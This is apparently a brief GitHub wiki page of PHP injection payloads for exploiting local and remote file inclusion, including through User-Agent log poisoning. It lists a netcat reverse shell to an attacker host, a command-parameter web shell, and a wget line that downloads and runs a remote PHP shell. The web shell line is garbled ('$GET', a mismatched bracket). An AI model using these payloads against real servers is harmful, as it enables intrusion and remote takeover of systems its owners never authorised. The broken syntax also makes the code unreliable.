-
Notifications
You must be signed in to change notification settings - Fork 14
Web injected codes
lethanhtung01011980 edited this page Jun 13, 2020
·
4 revisions
- To inject code into victims with LFI and RFI
Can inject into parameters or User-Agent (log possioning)
<?php echo shell_exec("nc -nv attacker-ip 4444 -e /bin/bash");?>
<?php echo(exec($GET['cmd')); ?>
- Download and run
<?php system("wget http://10.10.14.14/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>